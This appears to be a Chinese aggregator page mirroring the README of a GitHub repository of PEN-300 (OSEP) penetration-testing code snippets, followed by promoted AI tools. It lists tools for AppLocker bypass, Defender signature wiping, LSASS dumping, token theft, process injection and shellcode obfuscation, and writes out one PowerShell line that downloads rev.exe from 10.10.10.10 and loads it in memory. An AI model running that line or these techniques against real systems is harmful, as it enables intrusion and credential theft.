OSEP-Code-Snippets

OSEP-Code-Snippets

OSEP课程相关的渗透测试代码片段库

OSEP-Code-Snippets是一个基于Offensive Security PEN-300课程的代码示例集合。项目包含AppLocker绕过、无文件横向移动和Linux shellcode编码器等渗透测试工具,使用C#、PowerShell、Python和VBA等语言实现。代码示例涉及shellcode运行、进程注入和令牌窃取等高级技术,为信息安全专业人士提供学习和实践资源。所有代码均按原样提供,不含任何形式的保证。

OSEP代码片段shellcodePowerShell进程注入Github开源项目

OSEP 代码片段

代码示例按原样提供,不附带任何形式的保证。基于 Offensive Security 的 PEN-300 课程。

类和方法都是公开的,所以大多数二进制文件应该允许如下反射加载。

$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe') $assem = [System.Reflection.Assembly]::Load($data) [rev.Program]::Main("".Split())

目录

片段名称描述
AppLocker 绕过 PowerShell 运行空间 (C#)使用 CertUtilBitsAdminInstallUtil 组合的 AppLocker 绕过基础二进制文件。详情请参阅 README.md
无文件横向移动 (C#)在远程主机上擦除 Windows Defender 签名,并使用类似 PSExec 的方法(但使用现有进程)实现横向移动。接受目标、目标服务和要运行的目标二进制文件的参数。注意应选择非关键服务,如 SensorService
Linux shellcode 编码器 (Python)用于从 Linux 编码 C# 有效载荷的实用脚本,可以接收原始 shellcode 有效载荷(.bin),或自动从 'msfvenom' 输入。支持使用任意密钥进行 XOR 和 ROT 编码,并打印解码函数。可用于替换 C# ROT/XOR 编码器脚本。
Linux shellcode 加载器 (C)各种基于 C 的 shellcode 加载器,包括用于库劫持的基础二进制文件。
MiniDump (C# & PS1)将 LSASS 转储到 C:\Windows\Tasks\lsass.dmp 的简单二进制文件。还提供了原生 PowerShell 脚本版本。
MSSQL (C#)包含各种讨论过的 MSSQL 交互的示例二进制文件。根据需要更改代码以仅包含所需内容。
PrintSpoofer.NET (C#)窃取使用 PrintSpooler 漏洞 强制传入的身份验证令牌,并使用该令牌运行给定的二进制文件。经修改后无需交互式登录会话。接受管道名称和要运行的二进制文件的参数。
ROT shellcode 编码器 (C#)应用最先进的 ROT 编码来混淆 shellcode 的简单二进制文件。接受旋转次数的参数。
Sections shellcode 进程注入器 (C#)使用 NtCreateSectionNtMapViewOfSectionNtUnMapViewOfsectionNtClose 而不是"标准"方法来注入和运行 shellcode。
Shellcode 进程虚化 (C#)虚化一个 svchost 进程并从那里运行 shellcode。在编写时在 VirusTotal 上得分为 0/68。
Shellcode 进程注入器 (C# & PS1)应用进程注入的简单 shellcode 运行器。接受要注入的进程参数。如果未给出参数,则尝试根据权限级别选择合适的进程。还提供了原生 PowerShell 脚本版本(虽然稍微简单一些)。
简单 Shellcode 运行器 (C# & PS1 & VBA)最简单的 shellcode 运行器。还提供了原生 PowerShell 和 VBA 脚本版本。
XOR shellcode 编码器 (C#)应用最先进的 XOR 编码来混淆 shellcode 的简单二进制文件。

编辑推荐精选

Vora

Vora

免费创建高清无水印Sora视频

Vora是一个免费创建高清无水印Sora视频的AI工具

Refly.AI

Refly.AI

最适合小白的AI自动化工作流平台

无需编码,轻松生成可复用、可变现的AI自动化工作流

酷表ChatExcel

酷表ChatExcel

大模型驱动的Excel数据处理工具

基于大模型交互的表格处理系统,允许用户通过对话方式完成数据整理和可视化分析。系统采用机器学习算法解析用户指令,自动执行排序、公式计算和数据透视等操作,支持多种文件格式导入导出。数据处理响应速度保持在0.8秒以内,支持超过100万行数据的即时分析。

AI工具使用教程AI营销产品酷表ChatExcelAI智能客服
TRAE编程

TRAE编程

AI辅助编程,代码自动修复

Trae是一种自适应的集成开发环境(IDE),通过自动化和多元协作改变开发流程。利用Trae,团队能够更快速、精确地编写和部署代码,从而提高编程效率和项目交付速度。Trae具备上下文感知和代码自动完成功能,是提升开发效率的理想工具。

热门AI工具生产力协作转型TraeAI IDE
AIWritePaper论文写作

AIWritePaper论文写作

AI论文写作指导平台

AIWritePaper论文写作是一站式AI论文写作辅助工具,简化了选题、文献检索至论文撰写的整个过程。通过简单设定,平台可快速生成高质量论文大纲和全文,配合图表、参考文献等一应俱全,同时提供开题报告和答辩PPT等增值服务,保障数据安全,有效提升写作效率和论文质量。

数据安全AI助手热门AI工具AI辅助写作AI论文工具论文写作智能生成大纲
博思AIPPT

博思AIPPT

AI一键生成PPT,就用博思AIPPT!

博思AIPPT,新一代的AI生成PPT平台,支持智能生成PPT、AI美化PPT、文本&链接生成PPT、导入Word/PDF/Markdown文档生成PPT等,内置海量精美PPT模板,涵盖商务、教育、科技等不同风格,同时针对每个页面提供多种版式,一键自适应切换,完美适配各种办公场景。

热门AI工具AI办公办公工具智能排版AI生成PPT博思AIPPT海量精品模板AI创作
潮际好麦

潮际好麦

AI赋能电商视觉革命,一站式智能商拍平台

潮际好麦深耕服装行业,是国内AI试衣效果最好的软件。使用先进AIGC能力为电商卖家批量提供优质的、低成本的商拍图。合作品牌有Shein、Lazada、安踏、百丽等65个国内外头部品牌,以及国内10万+淘宝、天猫、京东等主流平台的品牌商家,为卖家节省将近85%的出图成本,提升约3倍出图效率,让品牌能够快速上架。

iTerms

iTerms

企业专属的AI法律顾问

iTerms是法大大集团旗下法律子品牌,基于最先进的大语言模型(LLM)、专业的法律知识库和强大的智能体架构,帮助企业扫清合规障碍,筑牢风控防线,成为您企业专属的AI法律顾问。

SimilarWeb流量提升

SimilarWeb流量提升

稳定高效的流量提升解决方案,助力品牌曝光

稳定高效的流量提升解决方案,助力品牌曝光

Sora2视频免费生成

Sora2视频免费生成

最新版Sora2模型免费使用,一键生成无水印视频

最新版Sora2模型免费使用,一键生成无水印视频

下拉加载更多